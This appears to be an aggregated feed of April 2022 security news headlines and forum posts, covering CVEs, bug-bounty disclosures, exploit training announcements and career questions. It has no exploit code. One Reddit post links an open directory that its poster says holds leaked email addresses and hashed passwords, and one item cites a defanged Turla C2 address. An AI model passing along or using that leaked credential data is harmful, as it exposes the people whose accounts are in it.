    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    CVE-2022-25372: Local Privilege Escalation in Pritunl VPN Client
    submitted by /u/hackers_and_builders [link] [comments]
    House of Heap Exploitation Dojo — CanSecWest 2022 Registration
    submitted by /u/mdulin2 [link] [comments]
    Wordle for CVEs!
    submitted by /u/benzies [link] [comments]
    Kepler: open source CVE Search Engine written in Rust
    submitted by /u/bndt00 [link] [comments]
    Shielder - A Sneak Peek into Smart Contracts Reversing and Emulation
    submitted by /u/smaury [link] [comments]
    CVE Markdown Charts - Your InfoSec reports will now write themselves...
    submitted by /u/onlinereadme [link] [comments]
    Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers. Interestingly, the app establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as Turla.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    An OD with all the photos of r/place
    The OD contains snapshots taken roughly every 30 seconds. https://rplace.space/combined/1649112455.png is the last photo before white became the only option. https://rplace.space/combined/ submitted by /u/PhlegethonAcheron [link] [comments]
    Screenshots of r/place. Taken every 30 seconds.
    submitted by /u/bigfootsocks [link] [comments]
    Can someone help me identify what I'm looking at? I'm afraid I've found something.
    Hello - honestly not sure what I'm looking at and found this oddly niche sub after my post was removed on NoStupidQuestions. I seem to have found some sort of directory with tons of files - some seeming to contain txt files called "indian embassy" or "xbox live leak" These files contain email addresses, and a hashed password as well as some other pieces of info. Am I looking at something harmless or have I found something nefarious? Here is a link to the directory. Please open a text file and tell me if I need to report to authorities or something? http://mirrors.xieke.org/Sec/ submitted by /u/Dgb_iii [link] [comments]
    Anyone know of an app or anything to more easily brows ODs on mobile? I’m constantly tapping to zoom in and browse- it’s a bit maddening. TIA!
    submitted by /u/platynom [link] [comments]
  • Open

    House of Heap Exploitation Training - CanSecWest 2022
    Heap exploitation serves as a huge wall on the binary exploitation journey. As a result, we have created a training for breaking through this wall. This training has been taught at DEFCON, ToorCon and to several private companies in the past. In this two day training, we will go over how the glibc malloc allocator works, a variety of heap specific vulnerability classes and demonstrate how to pwn the heap in a myriad of ways including the breaking of the allocator itself and living off the land with the program being targeted. To end the training, there is a HTTP server with realistic vulnerabilities. In the final section, we will create a full exploit chain with an info leak to break ASLR/PIE and getting code execution with a separate use after free. This section includes hands on exploit development with people helping you with the complex process of heap grooming, planning and exploiting. Feel free to reach out if you have any questions. Link to the training: https://www.register.cansecwest.com/csw22/heapexploitdojo submitted by /u/mdulin2 [link] [comments]
  • Open

    DISTRIBUTED VERIFICATION OF SSL CERTIFICATES
    Continue reading on Medium »
    Komodo Consulting — Best Black Box Pen Testing, Penetration Testing Service Provider
    Studies reveal that many web applications have medium- and high-risk security flaws. Also, it is easy to identify and exploit the… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Process Injection via Component Object Model (COM) IRundown::DoCallback() @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Threat Modeling
    🚧 저도 공부중인 부분이 많아서 잘못되거나 이상한 부분이 있을 수 있습니다. 이 글을 신뢰하진 마시고, 혹시나 잘못된 부분이 있을 경우 댓글로 알려주시면 정말 감사하겠습니다 :D 🔍 Introduction Threat modeling은 가치 있는 무언가를 보호하기 위해 위협과 완화 방안을 식별하고, 쉽게 이해할 수 있도록 표현합니다. Application, System, Service 등에서 보안에 영향을 끼칠 수 있는 모든 정보를 구조화하여 표현하고 이를 기반으로 보안적인 문제를 식별하는 방법론입니다. 저는 크게 아래와 같은 플로우로 정리할까 합니다.
    Spring4Shell RCE 취약점 (CVE-2022-22965)
    지난 주 Spring4Shell 취약점으로 인해 인터넷이 또 불탈 뻔 했습니다. 다행히 Log4Shell 보단 재현하기 어렵다는 문제로 무난하게 지나갔는데요. 겸사겸사 좀 늦었지만 이슈 정리해서 글로 올려볼까 합니다. Spring4Shell JDK 9버전 이상의 Spring Core에서 RCE(Remote Code Execution)이 가능한 취약점입니다. 공개 당시 0-day 상태였고, 이후 CVE-2022-22965 할당 및 패치가 공개되었습니다. 별거 아니다, 심각한거다 이야기가 많았는데 결국 CVSS 9.8을 받았네요. 문제점 JDK 9+에서 Spring MVC나 Spring WebFlux가 구동중이고, Endpoint에 Data binder가 enabled 된 경우에 Request에 포함된 공격코드를 Binding 하면서 공격자가 의도한 로직이 실행됩니다.
  • Open

    Making SMB Accessible with NTLMquic
    This week, I dusted off my reading list and saw that I’d previously bookmarked an interesting article about the introduction of SMB over QUIC. The article from Microsoft showed that Windows was including support for SMB to be used over the QUIC protocol, which should immediately spark interest for anyone who includes SMB attacks as... The post Making SMB Accessible with NTLMquic appeared first on TrustedSec.
  • Open

    Career changer. Any advice?
    Hi all - I have 3.5 years of a BS in Biology I couldn't graduate from because I had to take care of some medical affairs. I worked in medicine in many clinical roles for 7 or 8 years. So much BS in the health field had me running the other way. I found a job in tech sales, selling Tanium's cyber solution for almost a year. Then moved on to medical sales and have been doing that for almost 2 years now. I want to go back into cyber somehow, and am studying for Sec+. People tell me CCNA is the next most helpful cert to pick up for a job. Any advice for me in terms of job hunting? I am scared shitless I'll spend all this time getting certifications that nobody cares about. submitted by /u/verdite [link] [comments]
    Significance of image and original filename?
    I am currently playing around with Sysmon on Windows, and can't really wrap my head around the significance of the "Image" and "OriginalFileName" fields. From what I understand, the image is a read-only copy of the executable at the time it is run (say, C:\Windows\System32\cmd.exe). The original file name is part of the PE header (and thus, if signed, it is protected by the signature). Say an attacker sends you cmd.exe and renames it to outlook.exe, the original file name will still be cmd.exe - the attacker cannot change this without invalidating Microsoft's signature. My question is, from a defenders perspective, should a mismatch between image and original file name always be an immediate red flag, or are there legit use cases where the two can differ? submitted by /u/usair903 [link] [comments]
  • Open

    Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks
    Article URL: https://arstechnica.com/information-technology/2022/04/zyxel-patches-critical-vulnerability-that-can-allow-firewall-and-vpn-hijacks/ Comments URL: https://news.ycombinator.com/item?id=30918099 Points: 2 # Comments: 0
    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    DirtyPipe for Android
    Dirty Pipe (CVE-2022–0847) temporary root PoC for Android. Dirty Pipe root exploit for Android (Pixel 6) Targets Continue reading on Medium »
    Bug Bounty: How to get private invites
    Now I know that a lot of people will not like this answer and you certainly do not have to follow this method if you don’t wish to. Continue reading on Medium »
    CVE-2022–21907
    CVE-2022–21907: detection, protection, exploitation and demonstration. Exploitation: Powershell, Python, Ruby, NMAP and Metasploit… Continue reading on Medium »
    Spoof as another Facebook user to report an impostor account
    When I was helping someone take down a poser/impostor account. I tried to check the request body on what’s going on behind the scene. The… Continue reading on Medium »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf早报 | 部分云祭扫APP涉侵害隐私;美国务院成立网络空间和数字政策局
    当地时间4月4日,美国国务院宣布成立其第一个网络空间和数字政策局(CDP),该局强调联邦领域的数字现代化。
  • Open

    SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
    Palantir Public disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1525200 - Bounty: $5000
    Private invitation links/tokens leak to third-party analytics site
    HackerOne disclosed a bug submitted by bigbug: https://hackerone.com/reports/1491127 - Bounty: $500
  • Open

    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    MacBook Pro M1 2021 with Filevault enabled, how long would it take to bruteforce the password ?
    How long would it take to bruteforce an 18 character long password with numbers, caps and symbols, on a MacBook pro that has filevault enabled ? submitted by /u/huffilyvest28 [link] [comments]

  • Open

    Utilizando Fontes Abertas (OSINT) para descobrir o local dos vídeos de Bucha Ucrânia
    Nos últimos dias acompanhamos as notícias sobre o massacre realizado pelos russos em Bucha, na Ucrânia. Os jornais noticiaram que o… Continue reading on Medium »
    Ukraine — Point de situation au 5 avril
    Les dernières 24h Continue reading on Medium »
  • Open

    What certifications would I need to get a job as a security analyst?
    I'm soon starting a job as a support engineer. So not IT. I want to move into a security analyst position. I'm open to other roles but I think this would be a good start. I'm thinking I'll get security+ first, but don't know where to go from there. I don't think I have the offensive security skills for OSCP quite yet. submitted by /u/Throwaway_deafgrape [link] [comments]
    Are hosted password managers safe?
    AFAIK all hosted password managers (Bitwarden, LastPass, Roboform, ...) are based on a master password. That master password you enter on their website. What is stopping these companies / password managers from snooping that password or actually being able to decrypt **all** your passwords that are saved on their servers? I'm not talking about e.g. KeePass and managing the password store yourself, or self-hosting Bitwarden. Maybe I am missing something, like local hashing of the master password, but am I mistaken that all hosted password managers suffer the same flaw? They could all have some method to decrypt my password stores because I just don't know what's happening on their servers? submitted by /u/moontear [link] [comments]
    Best resource today for learning reverse engineering?
    Hey you guys, I'm tasked with learning reverse engineering, and I'm wondering what's the best, relevant and up-to-date resource for doing this. I should mention I am already familiar with assembly and have read practical malware analysis in the past, so I have the fundamentals. I also watched a few related courses in Pluralsight in the past few days, but I still feel like I am nowhere near proficient or knowledgeble enough to reverse binaries on my own. Suggestions? Thanks a lot! submitted by /u/Altiverses [link] [comments]
    Dynamic SSH for Multiple Remotes
    I'm configuring an architecture where a client workstation sends commands to a server within my LAN. That server, in turn, is responsible for communicating with many different base stations. The issue is the server-to-base station communication is unencrypted. Is a Dynamic SSH/SOCKS proxy server the answer to this? I envision a client sending commands to a known port on the server, the server forwarding the commands to the SOCKS proxy running locally, and the proxy transmitting the commands through an SSH tunnel to the requisite external IP:PORT combination. My gap in understanding is that the SOCKS proxy will need to communicate with several remote hosts. I'm just not sure if this the right approach, or if the syntax supports this. These remote hosts all have SSH enabled, so this appears to be the most lightweight solution. submitted by /u/InfamousClyde [link] [comments]
    Apple's Vulnerability Patch
    I'm a student studying security! Apple says it has urgently released two zero-day patches that affect MacOS and iOS. These are likely to be abused and are said to allow threatened parties to interfere with or access kernel activities. Apple has released additional security updates for vulnerabilities and macOS failures affecting both macOS and iOS. Their discovery is said to have been made by anonymous researchers. MacOS and iOS AVD components allow applications to execute arbitrary code with kernel privileges. Does anyone know more about this? submitted by /u/zwrinerlucas [link] [comments]
    Moving from Web application pentesting to mobile.
    As I've become familiar with the web app penetration testing, now the company is moving to mobile. Whats the process like, can you share some materials or methodologies which can be useful. I have zero experience with mobile app exploitation and absolutely no idea about how it should go. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
  • Open

    WordPress Overtakes Magento in Credit Card Skimmers
    One of the most important monitoring tools in our security platform is our Sucuri SiteCheck scanner. It’s a free tool to scan your website for known malicious content and malware injections. The usage of SiteCheck also allows us to monitor trends in the website security landscape, and one of the things that it can spot are JavaScript-based credit card skimmers, often referred to in the security community as #MageCart infections. MageCart derives its name from the eCommerce CMS platform Magento, which we’ve written about extensively on this blog. Continue reading WordPress Overtakes Magento in Credit Card Skimmers at Sucuri Blog.
  • Open

    Countries’ vulnerability to food trade shocks from network-based simulations
    Article URL: https://www.nature.com/articles/s41598-022-08419-2 Comments URL: https://news.ycombinator.com/item?id=30910793 Points: 2 # Comments: 0
    Researchers uncover a hardware security vulnerability on Android phones
    Article URL: https://techxplore.com/news/2022-04-uncover-hardware-vulnerability-android.html Comments URL: https://news.ycombinator.com/item?id=30907952 Points: 1 # Comments: 0
  • Open

    a ton of general stuff
    https://download.tuxfamily.org/ submitted by /u/heywhatsyournam [link] [comments]
  • Open

    (SQLI) How I Hack Hundreds Of Students Data On Goverment Website
    Hola everybody, short story when i browsing on goverment website i found search bar, and first came in to my mind is “SQL INJECTION” Continue reading on Medium »
    Oda is launching our bug bounty program!
    We’re super proud to announce to the world that we are launching our official bug bounty program. While we always aim to establish the… Continue reading on Oda Product & Tech »
    My Pentest Log -13- (Bypass Renaming on File Upload)
    Greetings from the Hippodrome everyone, Continue reading on Medium »
    HACKED NOKIA WITH REFLECTED CROSS-SITE SCRIPTING VULNERABILITY….
    Hello, Hackers Welcome to my other write-up of Nokia Hacked with RXSS Vulnerability… Continue reading on Medium »
    2FA… To Bypass
    Learn various ways to bypass 2FA Continue reading on Medium »
  • Open

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren 对于挖矿的检测以及防御方案 by ourren CDN及特征隐匿Cobalt Strike by ourren SecWiki周刊(第422期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren 对于挖矿的检测以及防御方案 by ourren CDN及特征隐匿Cobalt Strike by ourren SecWiki周刊(第422期) by ourren 更多最新文章,请访问SecWiki
  • Open

    OAST (Out-of-band Application Security Testing)
    🔍 Introduction OAST는 Out-of-band application security testing의 약자로 OOB(Out-Of-Band)를 이용한 보안 테스팅 방법을 의미합니다. OOB 자체만으로 보안 이슈가 발생하는건 아니지만, 이를 통해서 Blind 계통의 취약점(Blind RCE, Blind XSS, Blind SSRF 등)을 식별하거나 중요정보를 유출하는 등 활용도가 아주 높은 분석 방법입니다. 그리고 OAST는 ZAP, Burp 등 DAST(Dynamic Application Security Testing)에서 주요 스캔 모델로 선택되기도 하며 이는 실제로 스캔 성능에 큰 영향을 미칩니다. (탐지율 상승) 🗡 Offensive techniques ZAP ZAP에선 OAST 메뉴를 통해서 OAST 도메인을 얻고, Polling할 수 있습니다.
  • Open

    TruffleHog V3: Automatically validate over 600 API Keys
    submitted by /u/wifihack [link] [comments]
    Discovering Vulnerabilities in WordPress Plugins at Scale
    submitted by /u/jonas02 [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    submitted by /u/sciencestudent99 [link] [comments]
  • Open

    [api.krisp.ai] Race condition on /v2/seats endpoint allows bypassing the original seat limit
    Krisp disclosed a bug submitted by alp: https://hackerone.com/reports/1418419 - Bounty: $100
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Log Poisoning — Inject payloads in logs
    No content preview
    TryHackMe writeup: Game Zone
    No content preview
  • Open

    Exploiting Insecure Docker Registry
    submitted by /u/tbhaxor [link] [comments]
    Dockerized Spring4Shell Exploit Proof of Concept
    https://github.com/FourCoreLabs/spring4shell-exploit-poc submitted by /u/sciencestudent99 [link] [comments]

  • Open

    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »
  • Open

    Road to Go Pro — Special Edition: Fuzzing
    In this special edition, we are going to learn the new testing feature: fuzzing. I will share my thoughts on this feature in this story. Continue reading on Level Up Coding »
  • Open

    Vulnerability Excel template?
    I'm looking for a generic vulnerability register excel template to track risks within a number of products and some vulnerabilities outside of the products on the operational side of things. It seems like this should be a solved problem but Google isn't turning up any good results, any recommendations? We do have jira for when we want to actually schedule the work but due to the permissions setup and config I'd rather just keep that for work that is actively being worked on rather than cataloguing all vulnerabilities. submitted by /u/dbxp [link] [comments]
    Network support to security?
    Network Engineer to Security I am a network engineer at Cisco CCNP level. I had my security+ but it expired and I’ve always been interested in security but never nerded out on hack the box or anything. I want to transition from network support / engineering to cyber security but there are so many fields I’m having trouble. I know that since I have a deep background in core networking stuff network security makes sense for me, so I’m wondering if oscp is too app / windows at an enterprise focused. I kind of just want to pick a well respected cert and do it to completion cause I like following curriculums. I can learn on my own fine don’t mind cracking into a book but I like the organized start to finish and walk away with something that shows your time and effort structure of certifications. I like the syllabus of PWK for the most part I just don’t know if there’s a better path / course for me to take. I do meet all the prerequisite they say you need. My rough plan would be something like OSCP to transition from my current support role at large network vendor for Datacenter route switch, then after 1-2 years in a real security role, CISSP then consulting / management. I currently make $98k in networking, do you guys think I can jump to 120-130k if I get OSCP? submitted by /u/bearlapa [link] [comments]
    Now what?
    Finishing up a 14-week cybersecurity bootcamp, passed my CySA+ and got a pending 6-12 month contract as a Junior Analyst. My foot is officially in the door and I’m excited to get some hands on experience. That said, what are some “next steps” I should be focusing on to study or work towards? What other options beyond PenTesting are there after you’ve put in your time as a SOC grunt sifting through logs? I’m eager to just be making the transition into CyberSec, but want to keep the momentum and drive going and I’m curious what sort of roadmap others might suggest. Thanks! submitted by /u/DirtyMetis [link] [comments]
  • Open

    A step-by-step analysis of the Russian Turla backdoor called TinyTurla
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    SecWiki News 2022-04-03 Review
    从DARPA项目学习如何做安全研究 by ourren 欺骗Wappalyzer插件指纹识别 by tmr 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-03 Review
    从DARPA项目学习如何做安全研究 by ourren 欺骗Wappalyzer插件指纹识别 by tmr 更多最新文章,请访问SecWiki
  • Open

    Downloading of YT videos with search criteria
    Does anyone have a suggestion for a quick solution to download videos with specific surname in title before they are taken down? After this massacre in Ukrainian town Bucha I am afraid some prominent people will want to remove evidence for their support of this war. There is a particular mathematician I would like the world to remember. Some of his videos are already gone. submitted by /u/Base88Decode [link] [comments]
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    Image & Geospatial OSINT
    No content preview
    API authentication bypass on National Informatics Centre
    No content preview
    Finding Vulnerable Info Using Google Dorks — Ethical Hacking
    No content preview
  • Open

    HACKED INSTAGRAM HANDLE OF SAMSUNG….
    Hello, Hackers Welcome Back to my Stored Link Hijacking Scenario... Continue reading on Medium »
    OOB & Blind Testing using DNS Exfiltration
    Previous: Private Burp Collaborator Continue reading on Medium »
    Albus Security Trainee Application
    Hi Medium folk, before We start I'll introduce myself, So I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco… Continue reading on Medium »
  • Open

    I'm trying to read some logs but almost all of them have these characters all throughout the logs. Why might this be the case and is there anyway of reading it in properly?
    submitted by /u/finnster145 [link] [comments]
    Windows Forensics Roadmap
    What is the best approach to learn and practice Windows forensics? Is there any effective roadmap including books, courses, practice website, etc… submitted by /u/BFF100F0 [link] [comments]
    Via the command line, can you search a forensic image and pull out files?
    Had some ideas to make life easier around the office. I wanted to use PowerShell (or software that is CMD based) to search an E01 file and pull out specific files in set locations. Effectively like any other GUI based viewer such as FTK imager (but via command line instead.) I don't know of any software/scripts that allow me to do this? any advice? An alternative is, I could auto mount an E01 file with some software, and then search the mounted file system for artefacts in set locations such as prefetch files. then export them to my workstation. What do you think? Cheers! submitted by /u/GEAR-IT-UP [link] [comments]
  • Open

    Broken Domain Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1434179 - Bounty: $100

  • Open

    Is there any good friendly conference for sharing security knowledge such as incident response or automation?
    As the title said, Are you good-friendly conferences suitable for sharing security knowledge such as security automation? (besides black hat and Defcon) submitted by /u/Calm_Scene [link] [comments]
    How valuable is the Certificate of Cloud Security Knowledge (CCSK)?
    Hi, I have been working in the cybersecurity space for around 2 years now and have now decided to go for this cert: Certificate of Cloud Security Knowledge (CCSK) If and when I do complete the CCSK, how valuable will this be for future job prospects? Thanks submitted by /u/securm0n [link] [comments]
    Syn flooding one port?
    So I’m analyzing a wire shark PCAP, and I’m dumbfounded as to what is going on maybe someone here can help. So I’m analyzing A lot of packets from one Machine to another. These are the same machines over and over. It seems like one machine is targeting port 636 over TCP. It looks like an Nmap SYN scan Except that the initiating machine keeps changing the ports it uses while targeting one single port on the other machine. So it goes like this: X==Randomport A:X[SYN]>>B:636 B:636[SYN, ACK]>>A:X A:X[ACK]>>B:636 A:X[TLSv1 Client Hello]>>B:636 B:636[RST, ACK]>>A:X Then it will repeat but X increments by 1. Anyone familiar with this type of pattern that can shed some light I have no idea what this even is. I know port 636 is ldap but I can’t figure out what the machine inquiring(A) is doing I don’t know any scans that actively target only one port. Anyway any help is greatly appreciated. submitted by /u/Forsaken-Summer-4844 [link] [comments]
  • Open

    Introducing PacketStreamer - packet capture for Kubernetes and other platforms
    submitted by /u/foobarbazwibble [link] [comments]
    DoS vulnerability in firmware v3.0.3 of KNXnet/IP Secure router SCN-IP100.03
    submitted by /u/robertguetzkow [link] [comments]
  • Open

    Ukraine — Point de situation au 3 avril
    Les dernières 24h Continue reading on Medium »
    War in Ukraine / April 1
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    Image & Geospatial OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information from image or video files… Continue reading on InfoSec Write-ups »
    How to identify fake photos and videos?
    I publish simple and free tools for verifying (checking) photographic and video content posted in the news. Continue reading on Medium »
    Search by nickname and username
    Today we will analyze the topic of checking nicknames in the process of OSINT research. Did you know that the average person usually has… Continue reading on Medium »
  • Open

    MULTIPLE TIMES I HACKED DUKE UNIVERSITY WITH RXSS VULNERABILITY!!!
    I’m Going to share one of my other Reflected Cross-Site Scripting Scenario. Continue reading on Medium »
    Design Flaw — A Tale of Permanent DOS
    This is my first writeup here on medium. Hope you enjoy it :). Feedbacks are always appreciated! Continue reading on Medium »
    Cross Site Scripting (XSS) for Dummies
    Hello everyone, my name is Кристиян Радев but many of you may know me as CypherTheThird. I have been studying ethical hacking for a while… Continue reading on Medium »
    Oceanland Testnet Bug Bounty Program
    Early bird catches the worm 🐛 Continue reading on Medium »
    SCENARIO OF REFLECTED CROSS-SITE SCRIPTING VULNERABILITY $$$$
    Today I’m going to share one of my RXSS Scenarios. Continue reading on Medium »
    Manager From Hackthebox
    Part Of Intro to Android Exploitation Continue reading on InfoSec Write-ups »
    View Friends List of any users using “View as” | Facebook Bug bounty
    Hello guys, Continue reading on Medium »
    (READ-PDF!) You’re My Little Cuddle Bug Full
    You’re My Little Cuddle Bug Read Online    Download Link => You’re My Little Cuddle Bug     Deskripsi Book  Celebrate your little cuddle… Continue reading on Medium »
    Immunefi和stacks基金会发起Bug赏金计划
    Immunefi和stacks基金会发起Bug赏金计划。 Continue reading on Medium »
  • Open

    Lots of NSFW videos. Lots.
    submitted by /u/brother_p [link] [comments]
  • Open

    Found a useful Open Source Security Guide
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    FTK Imager unavailable?
    I was going to download FTK imager today, but the download link on both accessdata.com and exterro.com are broken. I went to their Twitter to check if there was any info there, but @AccessDataGroup is suspended and no info on @exterro. What's going on? submitted by /u/Bulletorpedo [link] [comments]
    Help with identifying names of transferred files
    I am trying to identify exactly what files did attacker transfer from his work PC to his USB drive. I have access to registry hives of attacked machine and vhdx file which i can mount and explore. Vhdx contains system logs in /System32/winevt/logs. Among those logs are Security.evtx , System.evtx and bunch of others. I know GUID of the USB that was used. The USB was encrypted with VeraCrypt. I know drive letters on which the USB was connected to the machine. I am trying to find all files that exist or existed on this USB. I tried to analyze the Secuirty.evtx file with windows events viewer and filtered for ID numbers 4656, 4660, 4663, 4670 but with no success. What am I doing wrong and what would be your methodology ? submitted by /u/threepairs [link] [comments]
    How does computer forensics people deal with amnesic systems like Tails?
    I used to use tails when I lived in China because I was too cheap to get a vpn (I ended up getting one anyways because tails is soooo slow). I still use it sometimes here back home in Sweden because it kind of makes me feel like haxor. Tails is supposedly completely amnesic and leaves 0 trace on the system after you've used it and shut it down. In Sweden, you need "physical" evidence to convict someone of a cyber crime. Just having logs of a specific IP doing something is (as far as I know) not enough, you also need logs or files etc on the suspects computer proving that the person did what they did. For example, if they have tracked that a specific IP address is buying illegal drugs, they also need to find evidence on the suspects computer of illegal activity. If Tails really is completely amnesic, would that not mean that its impossible to convict tails users of cyber crimes in countries with the same laws as Sweden unless you actually swat them and catch them in the act before they can shut it down? submitted by /u/CompoteDizzy [link] [comments]
  • Open

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
    How The Tables Have Turned: Analysis of Linux CVE-2022-10{15,16} in nf_tables
    Article URL: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/ Comments URL: https://news.ycombinator.com/item?id=30886025 Points: 1 # Comments: 0
  • Open

    RCE vulnerability with Java Spring framework (CVE-2022-22965)
    Article URL: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Comments URL: https://news.ycombinator.com/item?id=30890139 Points: 1 # Comments: 0
  • Open

    Shibboleth writeup | HackTheBox
    Shibboleth writeup | HackTheBox Continue reading on Medium »
    Remotely Dumping Chrome Cookies…Revisited
    TL;DR Security researcher Ron Masas (twitter: @RonMasas) recently wrote a tool (chrome-bandit) that extracts saved password from… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-02 Review
    加密数字货币合约交易的匿名性保护与对抗 by ourren XNU虚拟内存安全往事 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-02 Review
    加密数字货币合约交易的匿名性保护与对抗 by ourren XNU虚拟内存安全往事 by ourren 更多最新文章,请访问SecWiki
  • Open

    CSRF token validation system is disabled on Stripe Dashboard
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1483327 - Bounty: $2500
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Advanced Docker Security
    No content preview
    Manager From Hackthebox
    No content preview
  • Open

    Beginning reverse engineering and exploitation
    Hello, I'm a 21 years old finishing his computer science university degree. I've always been fascinated by security and after having a look around, the two areas that intrigue me are reverse engineering/malware analysis and exploitation in general. The entry barriers in both these fields are very hard and the learning curve is very steep. I've seen the pwn2own videos for exploitation and oalabs for malware analysis and, I have to admit it, I understood like less than 5% of what they said, so it'll be a lot of work. ​ I've done some research and I came up with a roadmap for reverse engineering/malware analysis: -C/C++ and Assembly (for asm I think it's best to start with a simple architecture, like MIPS, then move into x32/x64) -start writing small programs and reverse them using both a debugger/disassembler, learning about how they translate into assembly -learn about common malware techniques: unpacking, persistence techniques, process injection, obfuscation, building a sandbox, building a honeypot for capturing samples and so on. ​ The problems start with exploitation, here I am completely lost. I was able to find some basic explanations and tutorials about buffer/heap overflows, integer overflow, double free, use after free, null pointer dereference. It seems however that going from theory to practice is very very hard. Another subject that goes hand in hand with exploitation is fuzzing, which of course I don't understand. ​ Last thing, I've seen a blog post where someone was able to get code execution on a program using DLL Sideloading, is this related to exploitation? ​ What resources, courses, books, tips, tricks can I follow in order to get better and better in these two fields? Last but not least, English is not my mother tongue, sorry for any mistakes. Thanks for taking your time to read and for an eventual reply, have a good day ahead! submitted by /u/worldpwner [link] [comments]
  • Open

    重磅!证监会修订境内企业赴境外上市相关保密和档案管理规定
    《规定》共十三条,进一步明确企业信息安全责任,为境内企业境外发行证券和上市活动中境内企业、机构在保密和档案管理方面提供更清晰明确的指引。
    欧盟法律草案为所有加密交易增加安全检查
    近期,欧洲议会在反洗钱新立法的道路上迈出了坚实的第一步,新提案主要针对加密货币交易。
    GitLab 存在漏洞,允许攻击者接管用户账户
    GitLab 爆出漏洞,目前已被解决。
    Wyze摄像头曝出大漏洞,近三年时间才修复
    Wyze Cam被曝存在三个严重的安全漏洞,黑客利用这些漏洞可以执行任意代码,完全控制摄像头,并且访问设备中的视频资源。
    杰哥教你用Python对Emotet投递的恶意Excel表格提取IoCs
    杰哥教你用Python开发威胁情报提取工具之商马Emotet初始宏代码Excel表格
    IT服务巨头遭勒索软件攻击,损失超4200万美元
    西班牙一家领先的业务流程外包(BPO)服务提供商表示,因遭遇勒索软件攻击导致其损失超过数千万美元。
  • Open

    XNU 虚拟内存安全往事
